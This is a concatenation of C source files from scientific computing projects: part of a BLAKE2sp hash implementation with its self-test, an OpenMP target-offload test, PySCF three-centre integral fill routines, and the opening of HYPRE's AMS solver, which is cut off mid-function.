for( size_t i = 0; i < PARALLELISM_DEGREE; ++i )
if( blake2sp_init_leaf( S[i], outlen, keylen, i ) < 0 ) return -1;
S[PARALLELISM_DEGREE - 1]->last_node = 1; // mark last node
if( keylen > 0 )
{
uint8_t block[BLAKE2S_BLOCKBYTES];
memset( block, 0, BLAKE2S_BLOCKBYTES );
memcpy( block, key, keylen );
for( size_t i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( S[i], block, BLAKE2S_BLOCKBYTES );
secure_zero_memory( block, BLAKE2S_BLOCKBYTES ); /* Burn the key from stack */
}
#if defined(_OPENMP)
#pragma omp parallel shared(S,hash), num_threads(PARALLELISM_DEGREE)
#else
for( size_t id__ = 0; id__ < PARALLELISM_DEGREE; ++id__ )
#endif
{
#if defined(_OPENMP)
size_t id__ = omp_get_thread_num();
#endif
uint64_t inlen__ = inlen;
const uint8_t *in__ = ( const uint8_t * )in;
in__ += id__ * BLAKE2S_BLOCKBYTES;
while( inlen__ >= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES )
{
blake2s_update( S[id__], in__, BLAKE2S_BLOCKBYTES );
in__ += PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
inlen__ -= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
}
if( inlen__ > id__ * BLAKE2S_BLOCKBYTES )
{
const size_t left = inlen__ - id__ * BLAKE2S_BLOCKBYTES;
const size_t len = left <= BLAKE2S_BLOCKBYTES ? left : BLAKE2S_BLOCKBYTES;
blake2s_update( S[id__], in__, len );
}
blake2s_final( S[id__], hash[id__], BLAKE2S_OUTBYTES );
}
if( blake2sp_init_root( FS, outlen, keylen ) < 0 )
return -1;
FS->last_node = 1;
for( size_t i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( FS, hash[i], BLAKE2S_OUTBYTES );
return blake2s_final( FS, out, outlen );
}
#if defined(BLAKE2SP_SELFTEST)
#include <string.h>
#include "blake2-kat.h"
int main( int argc, char **argv )
{
uint8_t key[BLAKE2S_KEYBYTES];
uint8_t buf[KAT_LENGTH];
for( size_t i = 0; i < BLAKE2S_KEYBYTES; ++i )
key[i] = ( uint8_t )i;
for( size_t i = 0; i < KAT_LENGTH; ++i )
buf[i] = ( uint8_t )i;
for( size_t i = 0; i < KAT_LENGTH; ++i )
{
uint8_t hash[BLAKE2S_OUTBYTES];
blake2sp( hash, buf, key, BLAKE2S_OUTBYTES, i, BLAKE2S_KEYBYTES );
if( 0 != memcmp( hash, blake2sp_keyed_kat[i], BLAKE2S_OUTBYTES ) )
{
puts( "error" );
return -1;
}
}
puts( "ok" );
return 0;
}
#endif
|
host_targ.c | #include <stdio.h>
int arr[100];
int nt = 12;
int main()
{
#pragma omp target teams distribute parallel for num_threads(nt)
for (int i = 0; i < 100; i++)
arr[i] = i;
//Verify
int errors = 0;
for (int i = 0; i < 100; i++) {
if (arr[i] != i)
errors++;
}
if (!errors) {
fprintf(stderr, "Success\n");
return 0;
} else {
fprintf(stderr, "Failed\nErrors: %d\n", errors);
return 1;
}
}
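/* One plausible build line for an offloading toolchain (an assumption, not
   taken from the original source):
     clang -O2 -fopenmp -fopenmp-targets=nvptx64-nvidia-cuda host_targ.c -o host_targ
   Without an attached device, most compilers fall back to running the target
   region on the host, so the verification still passes. */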
|
fill_r_3c.c | /* Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*
* Author: Qiming Sun <osirpt.sun@gmail.com>
*/
#include <stdlib.h>
#include <stdio.h>
#include <complex.h>
#include "config.h"
#include "cint.h"
#include "gto/gto.h"
/*
* out[naoi,naoj,naok,comp] in F-order
*/
void GTOr3c_fill_s1(int (*intor)(), double complex *out, double complex *buf,
int comp, int ish, int jsh,
int *shls_slice, int *ao_loc, CINTOpt *cintopt,
int *atm, int natm, int *bas, int nbas, double *env)
{
const int ish0 = shls_slice[0];
const int ish1 = shls_slice[1];
const int jsh0 = shls_slice[2];
const int jsh1 = shls_slice[3];
const int ksh0 = shls_slice[4];
const int ksh1 = shls_slice[5];
const size_t naoi = ao_loc[ish1] - ao_loc[ish0];
const size_t naoj = ao_loc[jsh1] - ao_loc[jsh0];
const size_t naok = ao_loc[ksh1] - ao_loc[ksh0];
const size_t nij = naoi * naoj;
const int dims[] = {naoi, naoj, naok};
ish += ish0;
jsh += jsh0;
const int ip = ao_loc[ish] - ao_loc[ish0];
const int jp = ao_loc[jsh] - ao_loc[jsh0];
out += jp * naoi + ip;
int ksh, k0;
int shls[3];
shls[0] = ish;
shls[1] = jsh;
for (ksh = ksh0; ksh < ksh1; ksh++) {
shls[2] = ksh;
k0 = ao_loc[ksh ] - ao_loc[ksh0];
(*intor)(out+k0*nij, dims, shls, atm, natm, bas, nbas, env, cintopt, buf);
}
}
static void zcopy_s2_igtj(double complex *out, double complex *in, int comp,
int ip, int nij, int nijk, int di, int dj, int dk)
{
const size_t dij = di * dj;
const size_t ip1 = ip + 1;
int i, j, k, ic;
double complex *pout, *pin;
for (ic = 0; ic < comp; ic++) {
for (k = 0; k < dk; k++) {
pout = out + k * nij;
pin = in + k * dij;
for (i = 0; i < di; i++) {
for (j = 0; j < dj; j++) {
pout[j] = pin[j*di+i];
}
pout += ip1 + i;
}
}
out += nijk;
in += dij * dk;
}
}
static void zcopy_s2_ieqj(double complex *out, double complex *in, int comp,
int ip, int nij, int nijk, int di, int dj, int dk)
{
const size_t dij = di * dj;
const size_t ip1 = ip + 1;
int i, j, k, ic;
double complex *pout, *pin;
for (ic = 0; ic < comp; ic++) {
for (k = 0; k < dk; k++) {
pout = out + k * nij;
pin = in + k * dij;
for (i = 0; i < di; i++) {
for (j = 0; j <= i; j++) {
pout[j] = pin[j*di+i];
}
pout += ip1 + i;
}
}
out += nijk;
in += dij * dk;
}
}
/*
* out[comp,naok,nij] in C-order
* nij = i1*(i1+1)/2 - i0*(i0+1)/2
* [ \ ]
* [**** ]
* [***** ]
* [*****. ] <= . may not be filled, if jsh-upper-bound < ish-upper-bound
* [ \]
*/
void GTOr3c_fill_s2ij(int (*intor)(), double complex *out, double complex *buf,
int comp, int ish, int jsh,
int *shls_slice, int *ao_loc, CINTOpt *cintopt,
int *atm, int natm, int *bas, int nbas, double *env)
{
const int ish0 = shls_slice[0];
const int ish1 = shls_slice[1];
const int jsh0 = shls_slice[2];
ish += ish0;
jsh += jsh0;
const int ip = ao_loc[ish];
const int jp = ao_loc[jsh] - ao_loc[jsh0];
if (ip < jp) {
return;
}
const int ksh0 = shls_slice[4];
const int ksh1 = shls_slice[5];
const int i0 = ao_loc[ish0];
const int i1 = ao_loc[ish1];
const size_t naok = ao_loc[ksh1] - ao_loc[ksh0];
const size_t off = i0 * (i0 + 1) / 2;
const size_t nij = i1 * (i1 + 1) / 2 - off;
const size_t nijk = nij * naok;
const int di = ao_loc[ish+1] - ao_loc[ish];
const int dj = ao_loc[jsh+1] - ao_loc[jsh];
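/* Row ip of the packed lower triangle starts ip*(ip+1)/2 - off entries into
   this slice; adding jp lands on column jp of that row. */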
out += ip * (ip + 1) / 2 - off + jp;
int ksh, dk, k0;
int shls[3];
dk = GTOmax_shell_dim(ao_loc, shls_slice, 3);
double *cache = (double *)(buf + di * dj * dk * comp);
shls[0] = ish;
shls[1] = jsh;
for (ksh = ksh0; ksh < ksh1; ksh++) {
shls[2] = ksh;
dk = ao_loc[ksh+1] - ao_loc[ksh];
k0 = ao_loc[ksh ] - ao_loc[ksh0];
(*intor)(buf, NULL, shls, atm, natm, bas, nbas, env, cintopt, cache);
if (ip != jp) {
zcopy_s2_igtj(out+k0*nij, buf, comp, ip, nij, nijk, di, dj, dk);
} else {
zcopy_s2_ieqj(out+k0*nij, buf, comp, ip, nij, nijk, di, dj, dk);
}
}
}
void GTOr3c_fill_s2jk(int (*intor)(), double complex *out, double complex *buf,
int comp, int ish, int jsh,
int *shls_slice, int *ao_loc, CINTOpt *cintopt,
int *atm, int natm, int *bas, int nbas, double *env)
{
fprintf(stderr, "GTOr3c_fill_s2jk not implemented\n");
exit(1);
}
void GTOr3c_drv(int (*intor)(), void (*fill)(), double complex *eri, int comp,
int *shls_slice, int *ao_loc, CINTOpt *cintopt,
int *atm, int natm, int *bas, int nbas, double *env)
{
const int ish0 = shls_slice[0];
const int ish1 = shls_slice[1];
const int jsh0 = shls_slice[2];
const int jsh1 = shls_slice[3];
const int nish = ish1 - ish0;
const int njsh = jsh1 - jsh0;
const int di = GTOmax_shell_dim(ao_loc, shls_slice, 3);
const int cache_size = GTOmax_cache_size(intor, shls_slice, 3,
atm, natm, bas, nbas, env);
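/* One private integral buffer per thread; the (ish, jsh) shell pairs are
   flattened into a single index and scheduled dynamically because the
   per-pair cost varies with the shell dimensions. */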
#pragma omp parallel
{
int ish, jsh, ij;
double complex *buf = malloc(sizeof(double complex) *
(di*di*di*comp + cache_size/2));
#pragma omp for schedule(dynamic)
for (ij = 0; ij < nish*njsh; ij++) {
ish = ij / njsh;
jsh = ij % njsh;
(*fill)(intor, eri, buf, comp, ish, jsh, shls_slice, ao_loc,
cintopt, atm, natm, bas, nbas, env);
}
free(buf);
}
}
|
ams.c | /******************************************************************************
* Copyright 1998-2019 Lawrence Livermore National Security, LLC and other
* HYPRE Project Developers. See the top-level COPYRIGHT file for details.
*
* SPDX-License-Identifier: (Apache-2.0 OR MIT)
******************************************************************************/
#include "_hypre_parcsr_ls.h"
#include "float.h"
#include "ams.h"
#include "_hypre_utilities.hpp"
/*--------------------------------------------------------------------------
* hypre_ParCSRRelax
*
* Relaxation on the ParCSR matrix A with right-hand side f and
* initial guess u. Possible values for relax_type are:
*
* 1 = l1-scaled (or weighted) Jacobi
* 2 = l1-scaled block Gauss-Seidel/SSOR
* 3 = Kaczmarz
* 4 = truncated version of 2 (Remark 6.2 in smoothers paper)
* x = BoomerAMG relaxation with relax_type = |x|
* (16 = Cheby)
*
* The default value of relax_type is 2.
*--------------------------------------------------------------------------*/
HYPRE_Int
hypre_ParCSRRelax( hypre_ParCSRMatrix *A, /* matrix to relax with */
hypre_ParVector *f, /* right-hand side */
HYPRE_Int relax_type, /* relaxation type */
HYPRE_Int relax_times, /* number of sweeps */
HYPRE_Real *l1_norms, /* l1 norms of the rows of A */
HYPRE_Real relax_weight, /* damping coefficient (usually <= 1) */
HYPRE_Real omega, /* SOR parameter (usually in (0,2)) */
HYPRE_Real max_eig_est, /* for cheby smoothers */
HYPRE_Real min_eig_est,
HYPRE_Int cheby_order,
HYPRE_Real cheby_fraction,
hypre_ParVector *u, /* initial/updated approximation */
hypre_ParVector *v, /* temporary vector */
hypre_ParVector *z /* temporary vector */ )
{
HYPRE_Int sweep;
for (sweep = 0; sweep < relax_times; sweep++)
{
if (relax_type == 1) /* l1-scaled Jacobi */
{
hypre_BoomerAMGRelax(A, f, NULL, 7, 0, relax_weight, 1.0, l1_norms, u, v, z);
}
else if (relax_type == 2 || relax_type == 4) /* offd-l1-scaled block GS */
{
#if 0
if (relax_weight == 1.0 && omega == 1.0) /* symmetric Gauss-Seidel */
{
hypre_BoomerAMGRelaxHybridGaussSeidel_core(A, f, NULL, 0, 1.0, 1.0, l1_norms, u, v, z,
1, 1 /* symm */, 0 /* skip diag */, 1, 0);
}
else if (relax_weight == 1.0) /* SSOR */
{
hypre_BoomerAMGRelaxHybridGaussSeidel_core(A, f, NULL, 0, omega, 1.0, l1_norms, u, v, z,
1, 1 /* symm */, 0 /* skip diag */, 1, 0);
}
else /* scaled SSOR */
{
#endif
/* !!! relax_weight and omega flipped !!! */
hypre_BoomerAMGRelaxHybridGaussSeidel_core(A, f, NULL, 0, omega, relax_weight, l1_norms, u, v, z,
1, 1 /* symm */, 0 /* skip diag */, 1, 0);
#if 0
}
#endif
}
else if (relax_type == 3) /* Kaczmarz */
{
hypre_BoomerAMGRelax(A, f, NULL, 20, 0, relax_weight, omega, l1_norms, u, v, z);
}
else /* call BoomerAMG relaxation */
{
if (relax_type == 16)
{
hypre_ParCSRRelax_Cheby(A, f, max_eig_est, min_eig_est, cheby_fraction, cheby_order, 1,
0, u, v, z);
}
else
{
hypre_BoomerAMGRelax(A, f, NULL, hypre_abs(relax_type), 0, relax_weight,
omega, l1_norms, u, v, z);
}
}
}
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_ParVectorInRangeOf
*
* Return a vector that belongs to the range of a given matrix.
*--------------------------------------------------------------------------*/
hypre_ParVector *hypre_ParVectorInRangeOf(hypre_ParCSRMatrix *A)
{
hypre_ParVector *x;
x = hypre_ParVectorCreate(hypre_ParCSRMatrixComm(A),
hypre_ParCSRMatrixGlobalNumRows(A),
hypre_ParCSRMatrixRowStarts(A));
hypre_ParVectorInitialize(x);
hypre_ParVectorOwnsData(x) = 1;
hypre_ParVectorOwnsPartitioning(x) = 0;
return x;
}
/*--------------------------------------------------------------------------
* hypre_ParVectorInDomainOf
*
* Return a vector that belongs to the domain of a given matrix.
*--------------------------------------------------------------------------*/
hypre_ParVector *hypre_ParVectorInDomainOf(hypre_ParCSRMatrix *A)
{
hypre_ParVector *x;
x = hypre_ParVectorCreate(hypre_ParCSRMatrixComm(A),
hypre_ParCSRMatrixGlobalNumCols(A),
hypre_ParCSRMatrixColStarts(A));
hypre_ParVectorInitialize(x);
hypre_ParVectorOwnsData(x) = 1;
hypre_ParVectorOwnsPartitioning(x) = 0;
return x;
}
/*--------------------------------------------------------------------------
* hypre_ParVectorBlockSplit
*
* Extract the dim sub-vectors x_0,...,x_{dim-1} composing a parallel
* block vector x. It is assumed that &x[i] = [x_0[i],...,x_{dim-1}[i]].
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_ParVectorBlockSplit(hypre_ParVector *x,
hypre_ParVector *x_[3],
HYPRE_Int dim)
{
HYPRE_Int i, d, size_;
HYPRE_Real *x_data, *x_data_[3];
size_ = hypre_VectorSize(hypre_ParVectorLocalVector(x_[0]));
x_data = hypre_VectorData(hypre_ParVectorLocalVector(x));
for (d = 0; d < dim; d++)
x_data_[d] = hypre_VectorData(hypre_ParVectorLocalVector(x_[d]));
for (i = 0; i < size_; i++)
for (d = 0; d < dim; d++)
x_data_[d][i] = x_data[dim*i+d];
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_ParVectorBlockGather
*
* Compose a parallel block vector x from dim given sub-vectors
* x_0,...,x_{dim-1}, such that &x[i] = [x_0[i],...,x_{dim-1}[i]].
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_ParVectorBlockGather(hypre_ParVector *x,
hypre_ParVector *x_[3],
HYPRE_Int dim)
{
HYPRE_Int i, d, size_;
HYPRE_Real *x_data, *x_data_[3];
size_ = hypre_VectorSize(hypre_ParVectorLocalVector(x_[0]));
x_data = hypre_VectorData(hypre_ParVectorLocalVector(x));
for (d = 0; d < dim; d++)
x_data_[d] = hypre_VectorData(hypre_ParVectorLocalVector(x_[d]));
for (i = 0; i < size_; i++)
for (d = 0; d < dim; d++)
x_data[dim*i+d] = x_data_[d][i];
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_BoomerAMGBlockSolve
*
* Apply the block-diagonal solver diag(B) to the system diag(A) x = b.
* Here B is a given BoomerAMG solver for A, while x and b are "block"
* parallel vectors.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_BoomerAMGBlockSolve(void *B,
hypre_ParCSRMatrix *A,
hypre_ParVector *b,
hypre_ParVector *x)
{
HYPRE_Int d, dim = 1;
hypre_ParVector *b_[3];
hypre_ParVector *x_[3];
dim = hypre_ParVectorGlobalSize(x) / hypre_ParCSRMatrixGlobalNumRows(A);
if (dim == 1)
{
hypre_BoomerAMGSolve(B, A, b, x);
return hypre_error_flag;
}
for (d = 0; d < dim; d++)
{
b_[d] = hypre_ParVectorInRangeOf(A);
x_[d] = hypre_ParVectorInRangeOf(A);
}
hypre_ParVectorBlockSplit(b, b_, dim);
hypre_ParVectorBlockSplit(x, x_, dim);
for (d = 0; d < dim; d++)
hypre_BoomerAMGSolve(B, A, b_[d], x_[d]);
hypre_ParVectorBlockGather(x, x_, dim);
for (d = 0; d < dim; d++)
{
hypre_ParVectorDestroy(b_[d]);
hypre_ParVectorDestroy(x_[d]);
}
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_ParCSRMatrixFixZeroRows
*
* For every zero row in the matrix: set the diagonal element to 1.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_ParCSRMatrixFixZeroRows(hypre_ParCSRMatrix *A)
{
HYPRE_Int i, j;
HYPRE_Real l1_norm;
HYPRE_Int num_rows = hypre_ParCSRMatrixNumRows(A);
hypre_CSRMatrix *A_diag = hypre_ParCSRMatrixDiag(A);
HYPRE_Int *A_diag_I = hypre_CSRMatrixI(A_diag);
HYPRE_Int *A_diag_J = hypre_CSRMatrixJ(A_diag);
HYPRE_Real *A_diag_data = hypre_CSRMatrixData(A_diag);
hypre_CSRMatrix *A_offd = hypre_ParCSRMatrixOffd(A);
HYPRE_Int *A_offd_I = hypre_CSRMatrixI(A_offd);
HYPRE_Real *A_offd_data = hypre_CSRMatrixData(A_offd);
HYPRE_Int num_cols_offd = hypre_CSRMatrixNumCols(A_offd);
/* a row will be considered zero if its l1 norm is less than eps */
HYPRE_Real eps = 0.0; /* DBL_EPSILON * 1e+4; */
for (i = 0; i < num_rows; i++)
{
l1_norm = 0.0;
for (j = A_diag_I[i]; j < A_diag_I[i+1]; j++)
l1_norm += fabs(A_diag_data[j]);
if (num_cols_offd)
for (j = A_offd_I[i]; j < A_offd_I[i+1]; j++)
l1_norm += fabs(A_offd_data[j]);
if (l1_norm <= eps)
{
for (j = A_diag_I[i]; j < A_diag_I[i+1]; j++)
if (A_diag_J[j] == i)
A_diag_data[j] = 1.0;
else
A_diag_data[j] = 0.0;
if (num_cols_offd)
for (j = A_offd_I[i]; j < A_offd_I[i+1]; j++)
A_offd_data[j] = 0.0;
}
}
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_ParCSRComputeL1Norms
*
* Compute the l1 norms of the rows of a given matrix, depending on
* the option parameter:
*
* option 1 = Compute the l1 norm of the rows
* option 2 = Compute the l1 norm of the (processor) off-diagonal
* part of the rows plus the diagonal of A
* option 3 = Compute the l2 norm^2 of the rows
* option 4 = Truncated version of option 2 based on Remark 6.2 in "Multigrid
* Smoothers for Ultra-Parallel Computing"
*
* The above computations are done in a CF manner, whenever the provided
* cf_marker is not NULL.
*--------------------------------------------------------------------------*/
#if defined(HYPRE_USING_CUDA)
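/* Device-side functor for option 4: given the accumulated l1 norm x and the
   absolute diagonal y, fall back to the diagonal whenever x <= (4/3) y
   (the truncation of Remark 6.2). */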
struct l1_norm_op1 : public thrust::binary_function<HYPRE_Complex, HYPRE_Complex, HYPRE_Complex>
{
__host__ __device__
HYPRE_Complex operator()(HYPRE_Complex &x, HYPRE_Complex &y) const
{
return x <= 4.0/3.0 * y ? y : x;
}
};
#endif
HYPRE_Int hypre_ParCSRComputeL1Norms(hypre_ParCSRMatrix *A,
HYPRE_Int option,
HYPRE_Int *cf_marker,
HYPRE_Real **l1_norm_ptr)
{
HYPRE_Int i, j;
HYPRE_Int num_rows = hypre_ParCSRMatrixNumRows(A);
hypre_CSRMatrix *A_diag = hypre_ParCSRMatrixDiag(A);
hypre_CSRMatrix *A_offd = hypre_ParCSRMatrixOffd(A);
HYPRE_Int num_cols_offd = hypre_CSRMatrixNumCols(A_offd);
HYPRE_MemoryLocation memory_location_l1 = hypre_ParCSRMatrixMemoryLocation(A);
HYPRE_ExecutionPolicy exec = hypre_GetExecPolicy1( memory_location_l1 );
if (exec == HYPRE_EXEC_HOST)
{
HYPRE_Int num_threads = hypre_NumThreads();
if (num_threads > 1)
{
return hypre_ParCSRComputeL1NormsThreads(A, option, num_threads, cf_marker, l1_norm_ptr);
}
}
HYPRE_Real *l1_norm = hypre_TAlloc(HYPRE_Real, num_rows, memory_location_l1);
HYPRE_MemoryLocation memory_location_tmp = exec == HYPRE_EXEC_HOST ? HYPRE_MEMORY_HOST : HYPRE_MEMORY_DEVICE;
HYPRE_Real *diag_tmp = NULL;
HYPRE_Int *cf_marker_offd = NULL, *cf_marker_dev = NULL;
/* collect the cf marker data from other procs */
if (cf_marker != NULL)
{
HYPRE_Int index;
HYPRE_Int num_sends;
HYPRE_Int start;
HYPRE_Int *int_buf_data = NULL;
hypre_ParCSRCommPkg *comm_pkg = hypre_ParCSRMatrixCommPkg(A);
hypre_ParCSRCommHandle *comm_handle;
if (num_cols_offd)
{
cf_marker_offd = hypre_CTAlloc(HYPRE_Int, num_cols_offd, memory_location_tmp);
}
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
if (hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends))
{
int_buf_data = hypre_CTAlloc(HYPRE_Int, hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends),
HYPRE_MEMORY_HOST);
}
index = 0;
for (i = 0; i < num_sends; i++)
{
start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
for (j = start; j < hypre_ParCSRCommPkgSendMapStart(comm_pkg, i+1); j++)
{
int_buf_data[index++] = cf_marker[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
}
}
comm_handle = hypre_ParCSRCommHandleCreate_v2(11, comm_pkg, HYPRE_MEMORY_HOST, int_buf_data,
memory_location_tmp, cf_marker_offd);
hypre_ParCSRCommHandleDestroy(comm_handle);
hypre_TFree(int_buf_data, HYPRE_MEMORY_HOST);
if (exec == HYPRE_EXEC_DEVICE)
{
cf_marker_dev = hypre_TAlloc(HYPRE_Int, num_rows, HYPRE_MEMORY_DEVICE);
hypre_TMemcpy(cf_marker_dev, cf_marker, HYPRE_Int, num_rows, HYPRE_MEMORY_DEVICE, HYPRE_MEMORY_HOST);
}
else
{
cf_marker_dev = cf_marker;
}
}
if (option == 1)
{
/* Set the l1 norm of the diag part */
hypre_CSRMatrixComputeRowSum(A_diag, cf_marker_dev, cf_marker_dev, l1_norm, 1, 1.0, "set");
/* Add the l1 norm of the offd part */
if (num_cols_offd)
{
hypre_CSRMatrixComputeRowSum(A_offd, cf_marker_dev, cf_marker_offd, l1_norm, 1, 1.0, "add");
}
}
else if (option == 2)
{
/* Set the abs(diag) element */
hypre_CSRMatrixExtractDiagonal(A_diag, l1_norm, 1);
/* Add the l1 norm of the offd part */
if (num_cols_offd)
{
hypre_CSRMatrixComputeRowSum(A_offd, cf_marker_dev, cf_marker_offd, l1_norm, 1, 1.0, "add");
}
}
else if (option == 3)
{
/* Set the CF l2 norm of the diag part */
hypre_CSRMatrixComputeRowSum(A_diag, NULL, NULL, l1_norm, 2, 1.0, "set");
/* Add the CF l2 norm of the offd part */
if (num_cols_offd)
{
hypre_CSRMatrixComputeRowSum(A_offd, NULL, NULL, l1_norm, 2, 1.0, "add");
}
}
else if (option == 4)
{
/* Set the abs(diag) element */
hypre_CSRMatrixExtractDiagonal(A_diag, l1_norm, 1);
diag_tmp = hypre_TAlloc(HYPRE_Real, num_rows, memory_location_tmp);
hypre_TMemcpy(diag_tmp, l1_norm, HYPRE_Real, num_rows, memory_location_tmp, memory_location_l1);
/* Add the scaled l1 norm of the offd part */
if (num_cols_offd)
{
hypre_CSRMatrixComputeRowSum(A_offd, cf_marker_dev, cf_marker_offd, l1_norm, 1, 0.5, "add");
}
/* Truncate according to Remark 6.2 */
#if defined(HYPRE_USING_CUDA)
if (exec == HYPRE_EXEC_DEVICE)
{
HYPRE_THRUST_CALL( transform, l1_norm, l1_norm + num_rows, diag_tmp, l1_norm, l1_norm_op1() );
}
else
#endif
{
for (i = 0; i < num_rows; i++)
{
if (l1_norm[i] <= 4.0/3.0 * diag_tmp[i])
{
l1_norm[i] = diag_tmp[i];
}
}
}
}
else if (option == 5) /*stores diagonal of A for Jacobi using matvec, rlx 7 */
{
/* Set the diag element */
hypre_CSRMatrixExtractDiagonal(A_diag, l1_norm, 0);
#if defined(HYPRE_USING_CUDA)
if ( exec == HYPRE_EXEC_DEVICE)
{
thrust::identity<HYPRE_Complex> identity;
HYPRE_THRUST_CALL( replace_if, l1_norm, l1_norm + num_rows, thrust::not1(identity), 1.0 );
}
else
#endif
{
for (i = 0; i < num_rows; i++)
{
if (l1_norm[i] == 0.0)
{
l1_norm[i] = 1.0;
}
}
}
*l1_norm_ptr = l1_norm;
return hypre_error_flag;
}
/* Handle negative definite matrices */
if (!diag_tmp)
{
diag_tmp = hypre_TAlloc(HYPRE_Real, num_rows, memory_location_tmp);
}
/* Set the diag element */
hypre_CSRMatrixExtractDiagonal(A_diag, diag_tmp, 0);
#if defined(HYPRE_USING_CUDA)
if (exec == HYPRE_EXEC_DEVICE)
{
HYPRE_THRUST_CALL( transform_if, l1_norm, l1_norm + num_rows, diag_tmp, l1_norm, thrust::negate<HYPRE_Real>(),
is_negative<HYPRE_Real>() );
//bool any_zero = HYPRE_THRUST_CALL( any_of, l1_norm, l1_norm + num_rows, thrust::not1(thrust::identity<HYPRE_Complex>()) );
bool any_zero = 0.0 == HYPRE_THRUST_CALL( reduce, l1_norm, l1_norm + num_rows, 1.0, thrust::minimum<HYPRE_Real>() );
if ( any_zero )
{
hypre_error_in_arg(1);
}
}
else
#endif
{
for (i = 0; i < num_rows; i++)
{
if (diag_tmp[i] < 0.0)
{
l1_norm[i] = -l1_norm[i];
}
}
for (i = 0; i < num_rows; i++)
{
/* if (fabs(l1_norm[i]) < DBL_EPSILON) */
if (fabs(l1_norm[i]) == 0.0)
{
hypre_error_in_arg(1);
break;
}
}
}
if (exec == HYPRE_EXEC_DEVICE)
{
hypre_TFree(cf_marker_dev, HYPRE_MEMORY_DEVICE);
}
hypre_TFree(cf_marker_offd, memory_location_tmp);
hypre_TFree(diag_tmp, memory_location_tmp);
*l1_norm_ptr = l1_norm;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_ParCSRMatrixSetDiagRows
*
* For every row containing only a diagonal element: set it to d.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_ParCSRMatrixSetDiagRows(hypre_ParCSRMatrix *A, HYPRE_Real d)
{
HYPRE_Int i, j;
HYPRE_Int num_rows = hypre_ParCSRMatrixNumRows(A);
hypre_CSRMatrix *A_diag = hypre_ParCSRMatrixDiag(A);
HYPRE_Int *A_diag_I = hypre_CSRMatrixI(A_diag);
HYPRE_Int *A_diag_J = hypre_CSRMatrixJ(A_diag);
HYPRE_Real *A_diag_data = hypre_CSRMatrixData(A_diag);
hypre_CSRMatrix *A_offd = hypre_ParCSRMatrixOffd(A);
HYPRE_Int *A_offd_I = hypre_CSRMatrixI(A_offd);
HYPRE_Int num_cols_offd = hypre_CSRMatrixNumCols(A_offd);
for (i = 0; i < num_rows; i++)
{
j = A_diag_I[i];
if ((A_diag_I[i+1] == j+1) && (A_diag_J[j] == i) &&
(!num_cols_offd || (A_offd_I[i+1] == A_offd_I[i])))
{
A_diag_data[j] = d;
}
}
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSCreate
*
* Allocate the AMS solver structure.
*--------------------------------------------------------------------------*/
void * hypre_AMSCreate()
{
hypre_AMSData *ams_data;
ams_data = hypre_CTAlloc(hypre_AMSData, 1, HYPRE_MEMORY_HOST);
/* Default parameters */
ams_data -> dim = 3; /* 3D problem */
ams_data -> maxit = 20; /* perform at most 20 iterations */
ams_data -> tol = 1e-6; /* convergence tolerance */
ams_data -> print_level = 1; /* print residual norm at each step */
ams_data -> cycle_type = 1; /* a 3-level multiplicative solver */
ams_data -> A_relax_type = 2; /* offd-l1-scaled GS */
ams_data -> A_relax_times = 1; /* one relaxation sweep */
ams_data -> A_relax_weight = 1.0; /* damping parameter */
ams_data -> A_omega = 1.0; /* SSOR coefficient */
ams_data -> A_cheby_order = 2; /* Cheby: order (1-4 are valid) */
ams_data -> A_cheby_fraction = .3; /* Cheby: fraction of spectrum to smooth */
ams_data -> B_G_coarsen_type = 10; /* HMIS coarsening */
ams_data -> B_G_agg_levels = 1; /* Levels of aggressive coarsening */
ams_data -> B_G_relax_type = 3; /* hybrid G-S/Jacobi */
ams_data -> B_G_theta = 0.25; /* strength threshold */
ams_data -> B_G_interp_type = 0; /* interpolation type */
ams_data -> B_G_Pmax = 0; /* max nonzero elements in interp. rows */
ams_data -> B_Pi_coarsen_type = 10; /* HMIS coarsening */
ams_data -> B_Pi_agg_levels = 1; /* Levels of aggressive coarsening */
ams_data -> B_Pi_relax_type = 3; /* hybrid G-S/Jacobi */
ams_data -> B_Pi_theta = 0.25; /* strength threshold */
ams_data -> B_Pi_interp_type = 0; /* interpolation type */
ams_data -> B_Pi_Pmax = 0; /* max nonzero elements in interp. rows */
ams_data -> beta_is_zero = 0; /* the problem has a mass term */
/* By default, do l1-GS smoothing on the coarsest grid */
ams_data -> B_G_coarse_relax_type = 8;
ams_data -> B_Pi_coarse_relax_type = 8;
/* The rest of the fields are initialized using the Set functions */
ams_data -> A = NULL;
ams_data -> G = NULL;
ams_data -> A_G = NULL;
ams_data -> B_G = 0;
ams_data -> Pi = NULL;
ams_data -> A_Pi = NULL;
ams_data -> B_Pi = 0;
ams_data -> x = NULL;
ams_data -> y = NULL;
ams_data -> z = NULL;
ams_data -> Gx = NULL;
ams_data -> Gy = NULL;
ams_data -> Gz = NULL;
ams_data -> r0 = NULL;
ams_data -> g0 = NULL;
ams_data -> r1 = NULL;
ams_data -> g1 = NULL;
ams_data -> r2 = NULL;
ams_data -> g2 = NULL;
